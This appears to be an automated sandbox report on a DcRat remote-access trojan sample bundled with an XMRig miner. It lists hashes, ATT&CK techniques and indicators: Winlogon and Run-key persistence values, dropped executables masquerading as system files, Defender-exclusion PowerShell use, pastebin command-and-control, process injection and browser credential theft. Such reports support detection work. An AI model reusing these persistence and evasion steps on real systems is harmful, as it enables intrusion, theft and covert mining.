dcrat | 2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
01/02/2025, 18:20 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

235215E48C6B826E256D5918CBB1B0DA.exe
Size

7.2MB
MD5

235215e48c6b826e256d5918cbb1b0da
SHA1

7045d2e4da8d6102e3e199af4b848cac4ca934e1
SHA256

2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91
SHA512

feb1b3315da05d4466be68c6bb70dfdeaeaf8cb92ced1023db84c0d66a1b40e7f0fa9bad2d9e421b580887e1134dc7e30a25d5f9dc48f4e0cb780ebd93899df4
SSDEEP

196608:FPU+TdWWQbrlUIxOthZr2GbxuvzN5wWYNRdRT:JU+T4LbrlbxOFr2GFuv7+NRL

Score

10^/10

dcrat xmrig defense_evasion discovery execution infostealer miner persistence rat spyware stealer upx

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Recent\\winlogon.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Recent\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Recent\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\WIndowsDefendirCore.exe\", \"C:\\Users\\Default\\System.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Recent\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\WIndowsDefendirCore.exe\", \"C:\\Users\\Default\\System.exe\", \"C:\\Windows\\SysWOW64\\sr-Latn-RS\\lsass.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Recent\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\WIndowsDefendirCore.exe\", \"C:\\Users\\Default\\System.exe\", \"C:\\Windows\\SysWOW64\\sr-Latn-RS\\lsass.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\backgroundTaskHost.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Recent\\winlogon.exe\", \"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\WIndowsDefendirCore.exe\", \"C:\\Users\\Default\\System.exe\", \"C:\\Windows\\SysWOW64\\sr-Latn-RS\\lsass.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\backgroundTaskHost.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\DirecctX\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1864	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4188	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1900	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3068	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3532	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3400	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4532	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	392	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4488	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	388	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4512	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3716	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	908	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4080	4540	schtasks.exe	146
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1484	4540	schtasks.exe	146

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/4908-82-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-83-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-87-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-89-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-88-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-86-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-85-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-211-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4908-212-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4648	powershell.exe
4572	powershell.exe
1524	powershell.exe
812	powershell.exe
3900	powershell.exe
3136	powershell.exe
2960	powershell.exe
4356	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	235215E48C6B826E256D5918CBB1B0DA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	New.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	WIndowsDefendirCore.exe

Executes dropped EXE 5 IoCs

pid	Process
3616	New.exe
1144	build.exe
1000	bjqgtalbkeyq.exe
1428	WIndowsDefendirCore.exe
224	WIndowsDefendirCore.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Admin\\Recent\\winlogon.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Admin\\Recent\\winlogon.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIndowsDefendirCore = "\"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIndowsDefendirCore = "\"C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\SysWOW64\\sr-Latn-RS\\lsass.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\backgroundTaskHost.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\backgroundTaskHost.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIndowsDefendirCore = "\"C:\\Users\\Admin\\AppData\\Roaming\\DirecctX\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIndowsDefendirCore = "\"C:\\Users\\Admin\\AppData\\Roaming\\DirecctX\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Users\\Default\\System.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Users\\Default\\System.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\SysWOW64\\sr-Latn-RS\\lsass.exe\""	WIndowsDefendirCore.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	pastebin.com
19	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1628	powercfg.exe
3444	powercfg.exe
1528	powercfg.exe
1472	powercfg.exe
4528	powercfg.exe
1468	powercfg.exe
808	powercfg.exe
2580	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\sr-Latn-RS\6203df4a6bafc7	WIndowsDefendirCore.exe
File created	\??\c:\Windows\System32\CSCB92BA4CCAE6949149EF399A9C45CDC4F.TMP	csc.exe
File created	\??\c:\Windows\System32\lxswus.exe	csc.exe
File opened for modification	C:\Windows\system32\MRT.exe	build.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	bjqgtalbkeyq.exe
File created	C:\Windows\SysWOW64\sr-Latn-RS\lsass.exe	WIndowsDefendirCore.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1000 set thread context of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 set thread context of 4908	1000	bjqgtalbkeyq.exe	145

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4908-78-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-82-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-81-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-83-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-87-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-89-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-88-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-86-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-85-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-80-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-77-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-79-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-211-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4908-212-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\eddb19405b7ce1	WIndowsDefendirCore.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\WIndowsDefendirCore.exe	WIndowsDefendirCore.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\aa10ce1a1a1abf	WIndowsDefendirCore.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\backgroundTaskHost.exe	WIndowsDefendirCore.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\backgroundTaskHost.exe	WIndowsDefendirCore.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3560	sc.exe
512	sc.exe
5104	sc.exe
2356	sc.exe
2560	sc.exe
4536	sc.exe
3068	sc.exe
5056	sc.exe
1156	sc.exe
1216	sc.exe
2852	sc.exe
3676	sc.exe
2856	sc.exe
4996	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	235215E48C6B826E256D5918CBB1B0DA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2912	PING.EXE

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings	New.exe
Key created	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000_Classes\Local Settings	WIndowsDefendirCore.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2912	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5024	schtasks.exe
3532	schtasks.exe
3716	schtasks.exe
1592	schtasks.exe
908	schtasks.exe
1900	schtasks.exe
392	schtasks.exe
388	schtasks.exe
4188	schtasks.exe
4512	schtasks.exe
4080	schtasks.exe
1484	schtasks.exe
1864	schtasks.exe
3068	schtasks.exe
3400	schtasks.exe
4532	schtasks.exe
5100	schtasks.exe
4488	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1144	build.exe
3900	powershell.exe
3900	powershell.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1144	build.exe
1000	bjqgtalbkeyq.exe
3136	powershell.exe
3136	powershell.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
1000	bjqgtalbkeyq.exe
4908	explorer.exe
4908	explorer.exe
4908	explorer.exe
4908	explorer.exe
4908	explorer.exe
4908	explorer.exe
4908	explorer.exe
4908	explorer.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe
1428	WIndowsDefendirCore.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeShutdownPrivilege	1472	powercfg.exe
Token: SeCreatePagefilePrivilege	1472	powercfg.exe
Token: SeShutdownPrivilege	4528	powercfg.exe
Token: SeCreatePagefilePrivilege	4528	powercfg.exe
Token: SeShutdownPrivilege	1528	powercfg.exe
Token: SeCreatePagefilePrivilege	1528	powercfg.exe
Token: SeShutdownPrivilege	1468	powercfg.exe
Token: SeCreatePagefilePrivilege	1468	powercfg.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeShutdownPrivilege	1628	powercfg.exe
Token: SeCreatePagefilePrivilege	1628	powercfg.exe
Token: SeShutdownPrivilege	2580	powercfg.exe
Token: SeCreatePagefilePrivilege	2580	powercfg.exe
Token: SeShutdownPrivilege	808	powercfg.exe
Token: SeCreatePagefilePrivilege	808	powercfg.exe
Token: SeLockMemoryPrivilege	4908	explorer.exe
Token: SeShutdownPrivilege	3444	powercfg.exe
Token: SeCreatePagefilePrivilege	3444	powercfg.exe
Token: SeDebugPrivilege	1428	WIndowsDefendirCore.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	224	WIndowsDefendirCore.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 3788 wrote to memory of 3616	3788	235215E48C6B826E256D5918CBB1B0DA.exe	86
PID 3788 wrote to memory of 3616	3788	235215E48C6B826E256D5918CBB1B0DA.exe	86
PID 3788 wrote to memory of 3616	3788	235215E48C6B826E256D5918CBB1B0DA.exe	86
PID 3788 wrote to memory of 1144	3788	235215E48C6B826E256D5918CBB1B0DA.exe	87
PID 3788 wrote to memory of 1144	3788	235215E48C6B826E256D5918CBB1B0DA.exe	87
PID 3616 wrote to memory of 400	3616	New.exe	88
PID 3616 wrote to memory of 400	3616	New.exe	88
PID 3616 wrote to memory of 400	3616	New.exe	88
PID 4964 wrote to memory of 2300	4964	cmd.exe	97
PID 4964 wrote to memory of 2300	4964	cmd.exe	97
PID 3012 wrote to memory of 4504	3012	cmd.exe	127
PID 3012 wrote to memory of 4504	3012	cmd.exe	127
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 544	1000	bjqgtalbkeyq.exe	140
PID 1000 wrote to memory of 4908	1000	bjqgtalbkeyq.exe	145
PID 1000 wrote to memory of 4908	1000	bjqgtalbkeyq.exe	145
PID 1000 wrote to memory of 4908	1000	bjqgtalbkeyq.exe	145
PID 1000 wrote to memory of 4908	1000	bjqgtalbkeyq.exe	145
PID 1000 wrote to memory of 4908	1000	bjqgtalbkeyq.exe	145
PID 400 wrote to memory of 2600	400	WScript.exe	147
PID 400 wrote to memory of 2600	400	WScript.exe	147
PID 400 wrote to memory of 2600	400	WScript.exe	147
PID 2600 wrote to memory of 1428	2600	cmd.exe	149
PID 2600 wrote to memory of 1428	2600	cmd.exe	149
PID 1428 wrote to memory of 4424	1428	WIndowsDefendirCore.exe	153
PID 1428 wrote to memory of 4424	1428	WIndowsDefendirCore.exe	153
PID 4424 wrote to memory of 4672	4424	csc.exe	155
PID 4424 wrote to memory of 4672	4424	csc.exe	155
PID 1428 wrote to memory of 2960	1428	WIndowsDefendirCore.exe	171
PID 1428 wrote to memory of 2960	1428	WIndowsDefendirCore.exe	171
PID 1428 wrote to memory of 812	1428	WIndowsDefendirCore.exe	172
PID 1428 wrote to memory of 812	1428	WIndowsDefendirCore.exe	172
PID 1428 wrote to memory of 1524	1428	WIndowsDefendirCore.exe	173
PID 1428 wrote to memory of 1524	1428	WIndowsDefendirCore.exe	173
PID 1428 wrote to memory of 4572	1428	WIndowsDefendirCore.exe	174
PID 1428 wrote to memory of 4572	1428	WIndowsDefendirCore.exe	174
PID 1428 wrote to memory of 4648	1428	WIndowsDefendirCore.exe	175
PID 1428 wrote to memory of 4648	1428	WIndowsDefendirCore.exe	175
PID 1428 wrote to memory of 4356	1428	WIndowsDefendirCore.exe	176
